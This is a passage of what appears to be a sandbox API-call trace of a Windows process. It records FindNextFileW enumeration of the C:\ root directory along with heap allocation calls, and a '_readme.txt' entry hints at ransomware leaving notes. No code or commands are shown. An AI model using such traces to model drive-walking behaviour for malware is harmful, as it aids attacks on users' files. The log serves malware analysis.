ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0209.536] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0209.536] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0209.536] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286378 [0209.536] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.536] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x54) returned 0x327a528 [0209.536] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da90 [0209.536] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.536] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da20 | out: hHeap=0x750000) returned 1 [0209.536] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.536] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3277d68 | out: hHeap=0x750000) returned 1 [0209.536] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.536] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.536] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286378 | out: hHeap=0x750000) returned 1 [0209.536] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0209.536] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x32534b0 [0209.536] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x3253468 [0209.537] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x70) returned 0x32405b0 [0209.537] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da20 [0209.537] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286378 [0209.537] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.537] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da90 | out: hHeap=0x750000) returned 1 [0209.537] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.537] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.537] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x327a528 | out: hHeap=0x750000) returned 1 [0209.537] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x32534f8 [0209.537] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3253468 | out: hHeap=0x750000) returned 1 [0209.537] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32534b0 | out: hHeap=0x750000) returned 1 [0209.537] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x15b9cb20, ftLastWriteTime.dwHighDateTime=0x1d5ff3c, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0209.537] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0209.537] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.537] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.537] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xa8) returned 0x32311e8 [0209.537] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da90 [0209.537] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863f0 [0209.537] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286418 [0209.537] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x32534b0 [0209.537] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da20 | out: hHeap=0x750000) returned 1 [0209.537] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286378 | out: hHeap=0x750000) returned 1 [0209.537] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.538] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32534f8 | out: hHeap=0x750000) returned 1 [0209.538] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32405b0 | out: hHeap=0x750000) returned 1 [0209.538] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.538] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.538] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.538] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x13b07e00, ftLastWriteTime.dwHighDateTime=0x1d5ff3c, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0209.538] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0209.538] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.538] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.538] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286378 [0209.538] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.538] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.538] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe142af60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe142af60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0209.538] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da20 [0209.538] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.538] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xfc) returned 0x3217e98 [0209.538] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323dac8 [0209.538] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.538] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.538] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x32534f8 [0209.538] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286440 [0209.538] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.539] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da90 | out: hHeap=0x750000) returned 1 [0209.539] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863f0 | out: hHeap=0x750000) returned 1 [0209.539] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286418 | out: hHeap=0x750000) returned 1 [0209.539] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32534b0 | out: hHeap=0x750000) returned 1 [0209.539] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.539] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286378 | out: hHeap=0x750000) returned 1 [0209.539] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32311e8 | out: hHeap=0x750000) returned 1 [0209.539] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da90 [0209.539] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.539] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da20 | out: hHeap=0x750000) returned 1 [0209.539] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0209.539] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da20 [0209.539] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.539] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323db00 [0209.539] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.539] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da20 | out: hHeap=0x750000) returned 1 [0209.539] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0209.539] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286378 [0209.539] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.539] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286418 [0209.539] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.539] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286378 | out: hHeap=0x750000) returned 1 [0209.539] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0209.540] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286378 [0209.540] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.540] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x16c) returned 0x7bfd68 [0209.540] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da20 [0209.540] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863f0 [0209.540] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286490 [0209.540] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x32534b0 [0209.540] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32864b8 [0209.540] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32864e0 [0209.540] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.540] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323db38 [0209.540] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286508 [0209.540] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323dac8 | out: hHeap=0x750000) returned 1 [0209.540] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.540] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.540] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32534f8 | out: hHeap=0x750000) returned 1 [0209.540] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286440 | out: hHeap=0x750000) returned 1 [0209.540] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286468 | out: hHeap=0x750000) returned 1 [0209.540] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da90 | out: hHeap=0x750000) returned 1 [0209.540] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0209.540] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286418 | out: hHeap=0x750000) returned 1 [0209.541] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0209.541] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286418 [0209.541] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.541] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286378 | out: hHeap=0x750000) returned 1 [0209.541] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0209.541] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x32534f8 [0209.541] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x3253468 [0209.541] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x3253540 [0209.541] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3253468 | out: hHeap=0x750000) returned 1 [0209.541] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32534f8 | out: hHeap=0x750000) returned 1 [0209.541] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2bc8d3c0, ftCreationTime.dwHighDateTime=0x1d5ff3c, ftLastAccessTime.dwLowDateTime=0x2bc8d3c0, ftLastAccessTime.dwHighDateTime=0x1d5ff3c, ftLastWriteTime.dwLowDateTime=0x2bc8d3c0, ftLastWriteTime.dwHighDateTime=0x1d5ff3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemID", cAlternateFileName="")) returned 1 [0209.541] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286378 [0209.541] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.541] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.541] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.541] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286378 | out: hHeap=0x750000) returned 1 [0209.541] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0209.541] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286378 [0209.541] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.541] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286440 [0209.541] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.541] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286378 | out: hHeap=0x750000) returned 1 [0209.541] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0209.541] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286378 [0209.541] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.542] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x214) returned 0x328bd38 [0209.542] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323db00 [0209.542] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.542] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.542] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x32534f8 [0209.542] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.542] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3252310 [0209.542] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da90 [0209.542] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323dac8 [0209.542] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32523d8 [0209.542] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32524a0 [0209.542] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x3253468 [0209.542] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x7b38f0 [0209.542] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84078 [0209.542] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da20 | out: hHeap=0x750000) returned 1 [0209.542] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863f0 | out: hHeap=0x750000) returned 1 [0209.542] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286490 | out: hHeap=0x750000) returned 1 [0209.542] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32534b0 | out: hHeap=0x750000) returned 1 [0209.542] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32864b8 | out: hHeap=0x750000) returned 1 [0209.543] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32864e0 | out: hHeap=0x750000) returned 1 [0209.543] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.543] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db38 | out: hHeap=0x750000) returned 1 [0209.546] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286508 | out: hHeap=0x750000) returned 1 [0209.546] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286418 | out: hHeap=0x750000) returned 1 [0209.546] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3253540 | out: hHeap=0x750000) returned 1 [0209.546] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286468 | out: hHeap=0x750000) returned 1 [0209.546] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286440 | out: hHeap=0x750000) returned 1 [0209.546] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7bfd68 | out: hHeap=0x750000) returned 1 [0209.546] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286440 [0209.546] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.546] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286378 | out: hHeap=0x750000) returned 1 [0209.546] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x12020, ftCreationTime.dwLowDateTime=0x2c7b5ae0, ftCreationTime.dwHighDateTime=0x1d5ff3c, ftLastAccessTime.dwLowDateTime=0x2c7b5ae0, ftLastAccessTime.dwHighDateTime=0x1d5ff3c, ftLastWriteTime.dwLowDateTime=0x2c7b5ae0, ftLastWriteTime.dwHighDateTime=0x1d5ff3c, nFileSizeHigh=0x0, nFileSizeLow=0x45a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0209.546] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x12020, ftCreationTime.dwLowDateTime=0x2c7b5ae0, ftCreationTime.dwHighDateTime=0x1d5ff3c, ftLastAccessTime.dwLowDateTime=0x2c7b5ae0, ftLastAccessTime.dwHighDateTime=0x1d5ff3c, ftLastWriteTime.dwLowDateTime=0x2c7b5ae0, ftLastWriteTime.dwHighDateTime=0x1d5ff3c, nFileSizeHigh=0x0, nFileSizeLow=0x45a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0209.546] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.547] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.547] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323db38 [0209.547] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.547] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.547] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.547] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.547] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.547] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.547] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.547] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.547] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.547] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.547] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.547] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.547] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: 